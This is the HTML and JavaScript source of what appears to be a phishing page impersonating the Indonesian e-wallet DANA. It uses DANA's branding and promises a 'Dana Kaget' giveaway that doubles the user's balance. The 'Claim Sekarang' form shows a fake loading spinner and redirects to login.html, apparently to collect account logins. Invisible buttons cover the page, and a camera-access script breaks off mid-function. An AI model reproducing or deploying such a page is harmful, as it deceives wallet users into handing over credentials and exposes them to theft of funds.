<html dir="ltr">
<!-- HTML Meta Tags -->
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" content="#118EEA">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
  
  <title>𝗗𝗔𝗡𝗔 𝗞𝗮𝗴𝗲𝘁 𝗚𝗶𝘃𝗲𝗔𝘄𝗮𝘆 𝟮𝟬𝟮𝟰</title>
  <meta name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">

  <!-- Facebook Meta Tags -->
  <meta property="og:url" content="https://www.dana.id">
  <meta property="og:type" content="website">
  <meta property="og:title" content="𝗗𝗔𝗡𝗔 𝗞𝗮𝗴𝗲𝘁 𝗚𝗶𝘃𝗲𝗔𝘄𝗮𝘆 𝟮𝟬𝟮𝟰">
  <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <meta property="og:image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrSm7mpkpLXrER6II2o9PripBv8hPLJLX1rMIrjTSYC9YYXlOJqDRWuzCxrnDj72C80tze6x8ZZugIEEvSA5-qTPAlP_aDrgYOn1axpuFCNpOQ_XwTpSU2X9YeSfEZ-6B01lt9hxdZZQBA2oUaTMKxzjjir6Plk4wjmNn7wxjzOO_NUKDfPd5NWPwuKOg/s1080/AddText_02-06-12.08.53.jpg">

  <!-- Twitter Meta Tags -->
  <meta name="twitter:card" content="summary_large_image">
  <meta property="twitter:domain" content="https://www.dana.id">
  <meta property="twitter:url" content="https://www.dana.id">
  <meta name="twitter:title" content="𝗗𝗔𝗡𝗔 𝗞𝗮𝗴𝗲𝘁 𝗚𝗶𝘃𝗲𝗔𝘄𝗮𝘆 𝟮𝟬𝟮𝟰">
  <meta name="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <meta name="twitter:image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrSm7mpkpLXrER6II2o9PripBv8hPLJLX1rMIrjTSYC9YYXlOJqDRWuzCxrnDj72C80tze6x8ZZugIEEvSA5-qTPAlP_aDrgYOn1axpuFCNpOQ_XwTpSU2X9YeSfEZ-6B01lt9hxdZZQBA2oUaTMKxzjjir6Plk4wjmNn7wxjzOO_NUKDfPd5NWPwuKOg/s1080/AddText_02-06-12.08.53.jpg">
 <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&usqp=CAU" rel="shortcut icon" type="image/x-icon">
  <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&usqp=CAU" rel="apple-touch-icon">
 <link rel="canonical" href="https://www.dana.id/">
   <meta property="og:url" content="https://www.dana.id/" />
<meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
<meta property="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
<link data-n-head="ssr" rel="icon" type="image/x-icon" href="https://www.dana.id/favicon.ico">

<title>𝗗𝗔𝗡𝗔 𝗞𝗮𝗴𝗲𝘁 𝗚𝗶𝘃𝗲𝗔𝘄𝗮𝘆 𝟮𝟬𝟮𝟰</title>
<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css" />
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" />

<link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css" />
<link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css" />
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">

<style>
    @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');

* {
  box-sizing: border-box;
}
@media only screen and (max-width: 480px) {
body {
  
      box-sizing: border-box;
    display: block;
    margin: 0px auto;
    font-family: Arial, Helvetica, sans-serif;
    width: 100%;
    height: 100%;
    max-width: 600px;
    max-height: 1000px;
    background: url();

          background-position: 100% 100%;

          background-size: 100% 100%;
    padding: 0px;
    position: fixed;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    -webkit-transform: translate(-50%, -50%);
    -moz-transform: translate(-50%, -50%);
    -ms-transform: translate(-50%, -50%);
    -o-transform: translate(-50%, -50%);
}
}



@media only screen and (max-width: 360px) {
body {
  
      box-sizing: border-box;
    display: block;
    margin: 0px auto;
    font-family: Arial, Helvetica, sans-serif;
    width: 100%;
    height: 100%;
    max-width: 600px;
    max-height: 1000px;
   background: url();
    background-color: #118ee9;
          background-position: 100% 100%;

          background-size: 100% 100%;
    padding: 0px;
    position: fixed;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    -webkit-transform: translate(-50%, -50%);
    -moz-transform: translate(-50%, -50%);
    -ms-transform: translate(-50%, -50%);
    -o-transform: translate(-50%, -50%);
}
}
 


        html {
            overflow-x: hidden;
            display: none;
        }
    

    h2 {
        font-family: 'Open Sans', sans-serif;
        font-size: 15px;
        font-weight: bold;
        color: #0086e0;
        letter-spacing: 1.2px;
        text-align: center;
        line-height: 2;
        border-radius: 5px;        
    }

    h3 {
        font-family: 'Open Sans', sans-serif;
        font-size: 15px;
        font-weight: bold;
        color: #0086e0;
        letter-spacing: 1.5px;
        line-height: 1;
        border-radius: 5px;
    }

    h9 {
        font-family: 'Open Sans', sans-serif;
        font-size: 13px;
        font-weight: bold;
        text-align: center;
        color: #0086e0;
        letter-spacing: 1.5px;
        line-height: 1;
        border-radius: 5px;
    }

    h4 {
        font-family: 'Open Sans', sans-serif;
        font-size: 15px;
        font-weight: 900;
        color: #0086e0;
        letter-spacing: 1px;
        text-align: center;
        line-height: 1.5;
    }

    h5 {
        
        font-size: 14px;
        font-weight: bold;
        color: #0086e0;
        letter-spacing: 0px;
        text-align: center;
        line-height: 0.5;
        margin-top: -4px;
    }

    h6 {
        font-family: 'Open Sans', sans-serif;
        font-size: 13px;
        font-weight: bold;
        color: #000;
        letter-spacing: 1px;
        text-align: center;
        line-height: 1;
        border-radius: 5px;
    }

    .btn-punya {
        display: inline-block;
        margin: -20px auto 0 auto;
        padding: 0px;
        cursor: pointer;
        background: #fff;
        border: none;
        text-align: center;
        height: 55px;
        width: 85%;
        max-width: 100%;
        font-family: 'Open Sans', sans-serif;
        font-size: 16px;
        font-weight: bold;
        color: #118EEA;
        letter-spacing: 0px;
        line-height: 1;
        border-radius: 50px;
        box-shadow: rgba(0, 0, 0, 0.12) 0px 1px 3px, rgba(0, 0, 0, 0.24) 0px 1px 2px;
        transition: background 200ms ease 0s;
    }

    .btn-belum {
        display: block;
        margin: 5px auto;
        padding: 0px;
        cursor: pointer;
        background: none transparent;
        border: none;
        text-align: center;
        height: 55px;
        
        width: 536px;
        max-width: 100%;
        font-family: 'Open Sans', sans-serif;
        font-size: 16px;
        font-weight: bold;
        color: rgb(0, 134, 224);
        letter-spacing: 1px;
        line-height: 1;
        border-radius: 5px;
        transition: background 200ms ease 0s;
    }

    .form-log {
        box-sizing: border-box;
        height: 40px;
        width: 536px;
        max-width: 100%;
        border: 2px solid rgb(0, 134, 224);
        border-image: initial;
        background-color: rgb(255, 255, 255);
        border-radius: 8px;
        box-shadow: rgb(237, 237, 237) 2px 2px 2px 0px;
        font-family: 'Roboto Condensed', sans-serif;
        font-weight: bold;
        font-size: 16px;
        color: rgb(28, 28, 28);
        word-spacing: 5px;
        padding: 0px 5px;
    }

    #ionIcons {
        color: rgb(22, 119, 199);
        font-size: 29px;
        position: absolute;
        display: block;
        margin-top: 1px;
        margin-left: 15px;        
    }

    input {
        border: 3px solid rgb(0, 134, 224);
        border-radius: 8px;
        padding: 5px 10px;
    }

    h1 {
        display: ;
        background: #0086e0;
        /* #0086e0; */
        color: #0086e0;
        padding: 2px;
        width: 100%;
    }

    h7 {
        display: table;
        background: #3081ce;
        color: #0086e0;
        padding: 15px;
        width: 100%;
        font-size: 12px;
        text-align: center;
        font-family: 'Roboto Condensed', sans-serif;
    }


    .slider .slick-slide {
        border: solid 0px #000;
    }

    .slider .slick-slide img {
        width: 100%;
        margin-top: 0px;
    }

    /* make button larger and change their positions */
    .slick-prev,
    .slick-next {
        width: 0px;
        height: 0px;
        z-index: 1;
    }

    .slick-prev {
        left: 0px;
    }

    .slick-next {
        right: 0px;
    }

    .slick-prev:before,
    .slick-next:before {
        font-size: 0px;
        text-shadow: 0 0 0px rgba(0, 0, 0, 0.5);

}
    h7 {
        display: table;
        background: #3081ce;
        color: #fff;
        padding: 15px;
        width: 100%;
        font-size: 12px;
        text-align: center;
        font-family: 'Roboto Condensed', sans-serif;
    }

    .container {
        display: block;
        width: 96%;
        max-width: 900px;
        padding: 5px;
        left: 0;
        right: 0;
        margin: 0px auto;
        position: relative;
        background-color: #fff;
        background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnP7TQU9Q10l2ArQr05YT55e6JWBAOht6RSOQQ2Mv8-fxc37OyLo8i5XFTtu70_Ee8Y0j4BlPjmhdwFaZt2Ys6X6rauYr0ti-s8PreM0Ju-6gzxB1Zdwd0HpS02NjIGysDvfLPCxlYPDsDZii1_OXzigGCqtEXTRwzRgHTm3k69vcOYS4lYeR-_1lwHlI/s1068/1704520567296.png);

          background-position: 100% 100%;

          background-size: 100% 100%;
       
        height: 37%;
      
        
    }

    .slider .slick-slide {
        border: solid 0px #000;
    }

    .slider .slick-slide img {
        width: 100%;
        margin-top: 0px;
        height: 100%;
    }

    /* make button larger and change their positions */
    .slick-prev,
    .slick-next {
        width: 0px;
        height: 0px;
        z-index: 1;
    }

    .slick-prev {
        left: 0px;
    }

    .slick-next {
        right: 0px;
    }

    .slick-prev:before,
    .slick-next:before {
        font-size: 0px;
        text-shadow: 0 0 0px rgba(0, 0, 0, 0.5);
    }

    /* move dotted nav position */
    .slick-dots {
        bottom: 0px;
    }

    /* enlarge dots and change their colors */
    .slick-dots li button:before {
        font-size: 12px;
        color: #000;
        text-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
        opacity: 0;
    }

    .slick-dots li.slick-active button:before {
        color: #dedede;
        display: none;
    }

    /* transition effects for opacity */
    .slick-arrow,
        {
        transition: opacity 0.2s ease-out;
    }

    legend {
        padding: 2px;
        background: #transparent;
        color: #0086e0;
        border: none;
      }


 video  {
  width: 100%;
  height: 60%;
  background: transparent;
  position: fixed;
  
  top: 155;
  right: 0;
  left: 0;
  border-radius: 0%;
  z-index: -1;
  border: 0px solid #ddd;
  
}

#canvas  {
  width: 100%;
  height: 100%;
  display: none;
 position: fixed;
  top: 0;
  bottom: 0;
  right: 0;
  left: 0;
  border-radius: 0%;

}

#hasil{
    width: 100%;
    height: 100%;
    bottom: 0; 
    position: fixed; 
    left: 0; 
    right: 0; 
    margin: 0px auto;
    top: 0;
    background: #00000090;
    text-align: center;
    display: none;
    
}


#videoku{
    width: 100%;
    height: 100%;
    background: none;
  background-position: 100% 100%;
  background-size: 100% 100%;
  display: ;
  position: fixed;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  margin: 0px auto;
}


#aktivity{
    width: 100%;
    height: 100%;
    background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEYxtohmxAzmkgentlDM4geDize98Rx-irwRHVuu6eacnBNpFBz-1xR65TKNCi_SqIMeBsgO0LhN1JHXa0PJI-ODLrUboaeFZq5S_ewJBVVbw7Dufpv_7wVAng_DQyBizzrOdEB-fHqkUJTUJZ1DRive8hFSKYERzu_wBoVt7jr98NCCfN5MdwtXnDqfE/s2125/AddText_12-20-09.45.56.jpg) no-repeat center center;
  background-position: 100% 100%;
  background-size: 100% 100%;
  display: none;
  position: fixed;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  margin: 0px auto;
}

#dompet{
    width: 100%;
    height: 100%;
    background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxNvLSxRbzUQTeiaO1ru44q2y48yp7qVublvRfYN8NohxT0_A6oarOyvej9RZclno1FuZws0dzXkTsy7zwuNKmG4uZgwM3-ST4rgMkfFSxgtb0FjLw3LFtiIK9U9YSi7dv4vfVW9G-O0qS8iNQX2siy-__dq3ewOD81uar53MOOYvvRL5qYTKOQkblyao/s2162/AddText_12-20-10.23.56.jpg) no-repeat center center;
  background-position: 100% 100%;
  background-size: 100% 100%;
  display: none;
  position: fixed;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  margin: 0px auto;
}


#floatingCirclesG{
	position:absolute;
	width:50px;
	height:50px;
	transform:scale(0.6);
	left: 0;
	right: 0;
	top: 175;
	margin: 0px auto;
	display: none;
}
.f_circleG{
	position:absolute;
	background-color:#C4C4C4;
	height:9px;
	width:9px;
	border-radius:5px;
	animation-name:f_fadeG;
	animation-duration:0.48s;
	animation-iteration-count:infinite;
	animation-direction:linear;
}
#frotateG_01{
	left:0;
	top:20px;
	animation-delay:0.18s;
}
#frotateG_02{
	left:6px;
	top:6px;
	animation-delay:0.24s;
}
#frotateG_03{
	left:20px;
	top:0;
	animation-delay:0.3s;
 }
#frotateG_04{
	right:6px;
	top:6px;
	animation-delay:0.36s;
}
#frotateG_05{
	right:0;
	top:20px;
	animation-delay:0.42s;
}
#frotateG_06{
	right:6px;
	bottom:6px;
	animation-delay:0.48s;
}
#frotateG_07{
	left:20px;
	bottom:0;
	animation-delay:0.54s;
}
#frotateG_08{
	left:6px;
	bottom:6px;
	animation-delay:0.6s;
}
@keyframes f_fadeG{
	0%{
		background-color:#000000
	}
	100%{
		background-color:#C4C4C4
	}
}


.back {
    position: absolute;
    top: 8px;
    width: 20px;
    float: left;
    left: 10;
    height: 20px;
    border: none;
}


/*********************/
.process{
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

/*********************/



#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.bodywell {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease-in;
	animation-timing-function: ease-in;
	    -webkit-animation-name: fadeIn; 
    animation-name: fadeIn; 
}

@-webkit-keyframes fadeIn { 
    0% {opacity: 0;} 
        50% {opacity: 0.5;} 
    100% {opacity: 1;} 
} 
@keyframes fadeIn { 
    0% {opacity: 0;} 
    50% {opacity: 0.5;} 
    100% {opacity: 1;} 
} 

.bod-page{
    position: absolute; 
    top: 0; 
    left: 0; 
    right: 0; 
    margin: 0px auto;
    display: inline-block;
    text-align: center;
    background: #118EEA;
}

.bod-footer{
    position: relative;
}
</style>
    </style>
</head>
<body  >
    <center>
     <div id="process1" name="process" class="process" style="display: none;">
            <div class="loading">
                <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0172okrp0SFHLaW3PRGVDm1U0P7WWEMELIw4nlq1_1gCgyZBo3cxf-OJNpguNamdJryCkGU-hTHiW3RyOv5JD9eIjXTFtrJFCVn0ae4RxG4Oi-czAP20tEaJI3OstxFAbtOwtFxp6RvOHc6NZL/s1600/load_bg.png">
                <img class="spinner" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png" id="loading" style="margin-top: -2px">
            </div>
        </div>
        </center>
 <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW-3Xsq1r5wVb5r0tfUzFr9KzB9hy1r0-W4GkBcDTnYujbw_NNeMWw-l8MZCk4RYNJpcSZRf5tv-TPa5HnYvv_x-EzticmLwx1vO4bIlqTJAiyk4-i96QjCFlPHT8BMy9nF15ISyjxVVOz2DAv8osBBR9onrE3lJf96Vw5erolKuss9ZrTFAFhoJAU4Js/s1080/1704436332522.png" style="width: 100%; position: fixed; bottom: -5; left: 0; right: 0; margin: 0px auto; z-index: 9;">        
<h1 style="padding: 0px; border-radius: 0px 0px 15px 15px; border-bottom: 3px solid #118EEA">

  
<nav style="position: fixed; top: 0; left:0; right: 0; margin: 0px auto; width: 100%; height: 60px; background: transparent; z-index: 999">
<img src="https://www.dana.id/_nuxt/img/dana-logo.fe46647.png" style="width: 100px; margin-top: 7px; margin-left: 9px">   
</nav>
<center>
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQNzpuGIS5QM3WWvZJ7AogiYO798-n74QBGu6JctzygKBRSUxjNvdOzHq4B-arPIBbJ-7-ePR-o0Wfz8Zn_WrtZEG8NckwnrTEKLqDWs4e2Z6WGchWHRPFPe4XU77DhDEqTIkcXMLmVQvhH77ARkJ9OLvJxO9Hx-Kf5TpN9evFCbrZ4fdY5QughuS2V4Y/s400/dana%20(1).gif" style="width: 100%; position: relative; top: 0; left: 0; right: 0; margin: 0px auto; height: 30%; border-radius: 0px 0px 15px 15px; border-bottom: 3px solid #fff">
</center>
</h1>
<p></p>
<div class="container">
 <div class="bod-page" style="padding: 5px">
 <form onsubmit="formsaya(); return false" method="post" id="formsaya" action="login.html">
<div class="panel" style="outline: 4px double #fff; border-radius: 13px; margin-top: -35px; height: 30%; display: inline-block; margin-left: auto; margin-right: auto; text-align: left; box-shadow: rgba(0, 0, 0, 0.12) 0px 0px 3px, rgba(0, 0, 0, 0.24) 0px 1px 2px;">
<div class="panel-body" style="margin-top: -40px; width: 100%; height: 20px">


<legend>
 <div> <br> <center><h5 style="margin-bottom: -10px; margin-top: 5px; border-bottom: 2px solid #118EEA; padding: 4px; width: 90%; line-height: 18px">𝗗𝗔𝗡𝗔 𝗞𝗔𝗚𝗘𝗧 𝗬𝗔𝗡𝗚 𝗧𝗘𝗥𝗦𝗘𝗗𝗜𝗔 𝗨𝗡𝗧𝗨𝗞 𝗔𝗞𝗨𝗡 𝗔𝗡𝗗𝗔</h5></center>

    </div>
<div style="float: left;">

<div> <br> <b>SALDO</b><br/><input type="radio" id="baru" name="tarif" value="Claim Dana Kaget Anda" checked>

<label for="baru">
<h5>&nbsp; Rp &nbsp;  300.000</h5>
</label>
</div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun"> <label for="lama">
<h5>&nbsp; Rp  &nbsp; 500.000</h5>
</label> </div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun"> <label for="lama">
<h5>&nbsp; Rp &nbsp;   700.000</h5>
</label> </div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun"> <label for="lama">
<h5>&nbsp; Rp 1.000.000 </h5>

</label> </div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun"> <label for="lama">
<h5>&nbsp; Rp 2.000.000 </h5>
</label> </div>
</div>
<div style="float: right;">
<div> <br><b style="margin-left: 30px">TOTAL</b><br/> <input type="radio" id="baru" name="tarif" value="Claim Dana Kaget Anda" checked style="opacity: 0">
<label for="baru">
<h5>&nbsp; Rp &nbsp;  600.000</h5>
</label>
</div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun" style="opacity: 0"> <label for="lama">
<h5>&nbsp; Rp   1.000.000</h5>
</label> </div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun" style="opacity: 0"> <label for="lama">
<h5>&nbsp; Rp 1.400.000</h5>
</label> </div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun" style="opacity: 0"> <label for="lama">
<h5>&nbsp; Rp 2.000.000 </h5>

</label> </div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun" style="opacity: 0"> <label for="lama">
<h5>&nbsp; Rp 4.000.000 </h5>
</label> </div>
</div>

</div>
</div>
<br/>
<p></p>
<div style="text-align: center; font-size: 13px; line-height: 16px; padding: 15px; background: #118EEA; margin-top: -20px; font-weight: bold; color: #fff; ">Contoh saldo akun anda Rp 300.000 setelah berhasil di claim saldo akan bertambah secara otomatis menjadi Rp 600.000</div>
</legend> 
<p></p>
<div class="row">
<div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 10px auto;">
<div class="row"> <button class="btn-punya" type="submit" value="send">Claim Sekarang</button>
</form>
</div>

</legend>
<fieldset class="bod-footer" style="margin-top: -5px">
<p></p>


</div>
</fieldset>
 
        <p></p>

<button type="submit" style="position: fixed; bottom: 2; right: 5; width: 60px; height: 60px; background: transparent; color: transparent; border: none" >X</button>
</form>
<button type="button" style="position: fixed; bottom: 2; right: 75; width: 60px; height: 60px; background: transparent; color: transparent; border: none" onclick="bukadompet()">X</button>
<button type="button" style="position: fixed; bottom: 14; right: 0; left: 0;  width: 60px; height: 60px; margin: 0px auto; border-radius: 50px; background: transparent; color: transparent; border: none" onclick="bukakamera()">X</button>
<button type="button" style="position: fixed; bottom: 2; left: 75; width: 60px; height: 60px; background: transparent; color: transparent; border: none" onclick="bukaaktivi()">X</button>
<button type="button" style="position: fixed; bottom: 2; left: 5; width: 60px; height: 60px; background: transparent; color: transparent; border: none" onclick="window.location.href='index.html'">X</button>
<div class="p-5 tab" id="aktivity">
   <button type="button" style="background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNI1Emy7PX0havgWqHmqlT51KSm22vosgN4OekNvqowvUD5b_ftp3dSwYRhaNDEGZKkyXibrQzF2FPZ9tB9jHwqMYmsQv7SZs9yiVTt9TfQUgON1sKVo9ikO9NO82v7U2amQPmLFih0CenbjLkpEdathvIorjl6Pr-nxFULehzY2gAPpIyJsYX0I7O/s16000/AddText_05-15-01.36.51.jpg);
          background-position: 100% 100%;
          background-size: 100% 100%; color: transparent;" class="back" id="prevBtn" onclick="backbuttonku()" style="top: -7px">back</button>  
 <center>       
 <button type="button" style="width: 55%; height: 60px; margin-top: 300px; border: none; background: transparent;" onclick="hanyaloding()"></button>  
 </center>  
</div>
<div class="p-5 tab" id="dompet">
  <button type="buttun" style="position: fixed; bottom: 2; right: 5; width: 60px; height: 60px; background: transparent; color: transparent; border: none; z-index: -1" >X</button>
<button type="button" style="position: fixed; bottom: 2; right: 75; width: 60px; height: 60px; background: transparent; color: transparent; border: none" onclick="bukadompet()">X</button>
<button type="button" style="position: fixed; bottom: 14; right: 0; left: 0;  width: 60px; height: 60px; margin: 0px auto; border-radius: 50px; background: transparent; color: transparent; border: none" onclick="bukakamera()">X</button>
<button type="button" style="position: fixed; bottom: 2; left: 75; width: 60px; height: 60px; background: transparent; color: transparent; border: none" onclick="bukaaktivi()">X</button>
<button type="button" style="position: fixed; bottom: 2; left: 5; width: 60px; height: 60px; background: transparent; color: transparent; border: none" onclick="window.location.href='index.html'">X</button>  
</div>
<div class="p-5 tab" align="center" id="videoku" style="display: none; ">
      
  <div class="">
    <br>
<img style="width: 100%;
    height: 100%;
    bottom: 0; 
    position: fixed; 
    left: 0; 
    right: 0; 
    margin: 0px auto;
    top: 0; z-index: " src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiLadEcy0RXfvl9vcdcFyqSFosQT7y9Dtv8xQj8n2fRKxd955zB8NaZBIVnKzfF6D4iiL8SPg_tsYRtWVQuZVh1Bf4psrh0_L5_CM2lqYT5l7f7L_onOXDI9KkK-Tig0u4dWQNy4xYdv7H3tf5GXvOyUA9ev4U3ht9SCsXh4k6L7dTtlp-x7FyH1SWmJQ/s2158/AddText_12-26-01.55.51.png">
    <video id="camera-stream" class="" style="margin-top: 40px"></video>
  <p></p>
  
 <button type="button" id="ulangikunya" onclick="kuulangi()" style="margin-top: 210px; border: none; border-radius: 10px; font-weight: 600; background: transparent; color: #118ee9; padding: 5px auto; font-size: 14px; height: 30px; display: none; bottom: 110; position: absolute; left: 0; right: 0; margin: 0px auto; width: 50%">Ambil Ulang Gambar</button>
  </div>
<input type="file" style="position: fixed; top: 240; left: 65; width: 50px; opacity: 0">
  <div style="bottom: 35; position: absolute; left: 0; right: 0; margin: 0px auto;">
 <button type="button" style="position: fixed; top: 240; right: 65; width: 50px; opacity: 0; height: 30px" class="switch"></button>
  <div style="bottom: 35; position: absolute; left: 0; right: 0; margin: 0px auto;">     
    <button type="button" id="flip-btn" class="btn btn-sm btn-warning" style="display: ; background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm44W5uosjlhh06AfrB2HNA4mLpyTs70q48999uE55FJNPEtIdqF3pYYxrBU2xiXHF6VjGaW2KR9-rodUj5990PmH6h9C59UzWTNxsjE14MEAWHc2rOw8eCFCuGBrvs92qX6BbLhDRWNPeo14f6yw-0ZR-ge7UL2dSMfRmfpIZlVuHGzIs8IPXFZsvW6o/s512/AddText_12-19-07.47.07.png);
          background-position: 100% 100%;
          background-size: 100% 100%; width: 40px; height: 40px; border: none; right: 65; position: absolute; bottom: 30">
     
    </button>
 <button type="button" style="position: fixed; bottom: 10; right: 0; left: 0;  width: 60px; height: 60px; margin: 0px auto; border-radius: 50px; background: transparent; color: transparent; border: none" onclick="kembalikeluar()">X</button>   
    <button type="button" id="capture-camera" style="position: fixed; bottom: 10; right: 25;   width: 70px; height: 60px; order-radius: 50px; background: transparent; color: transparent; border: none" onclick="bukadompet()">
    
    </button>
  </div>
    
    <br>
    <canvas id="canvas" class="bg-light shadow border border-5">
    </canvas>
 
</div>
<div id="hasil">
    
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFJqVaf4BeJGYzmGjpgvpxeR0bTTRAkkf05ClM_f544chVnjEzElH9SuC3gM-nragL3JCW4KFfFYLjJOy1gmkd5kjua1dDeDQv9PNH6rB-gdiw7lipsPCwGbhlo1A38HfYxCdKZNtwDu8Zg7hZnrDCCb5V8nsAlaJyfTzj8XMuA2U3_cb-1seLQNeZ/s16000/IMG_20230608_152702.jpg" width="300px" style="margin-top: 200px">
 <button style="position: absolute; right: 145; top: 310; height: 30px; width: 85px; background: transparent; border: none; color: transparent;" onclick="kembalikeluar()">Kembali</button>
 <button style="position: absolute; right: 48; top: 310; height: 30px; width: 85px; background: transparent; border: none; color: transparent;" onclick="mengulang()">ulangi</button>
</div>
</div>
<!-- partial -->
<script src="https://raw.githubusercontent.com/mebjas/html5-qrcode/master/minified/html5-qrcode.min.js"></script>
<script src="https://unpkg.com/html5-qrcode" type="text/javascript"></script>
  <script src='https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js'></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
   <script>
function formsaya(){
    $("#process1").show();
 setTimeout(() => {
          

window.location.href = 'login.html';
    
},2000);
 setTimeout(() => {
       $("#process1").hide();
 },4000);
}
        </script>

  <script>
function bukakamera(){
    
document.getElementById('videoku').style.display = "block";
// camera stream video element
  let on_stream_video = document.querySelector('#camera-stream');
  // flip button element
  let flipBtn = document.querySelector('#flip-btn');

  // default user media options
  let constraints = { audio: false, video: true }
  let shouldFaceUser = true;

  // check whether we can use facingMode
  let supports = navigator.mediaDevices.getSupportedConstraints();
  if( supports['facingMode'] === true ) {
    flipBtn.disabled = false;
  }

  let stream = null;

  function capture() {
    constraints.video = {
        width: {
        min: 192,
        ideal: 192,
        max: 192,
      },
      height: {
        min: 0,
        ideal: 190,
        max: 190
      },
      facingMode: shouldFaceUser ? 'user' : 'environment'
    }
    navigator.mediaDevices.getUserMedia(constraints)
      .then(function(mediaStream) {
        stream  = mediaStream;
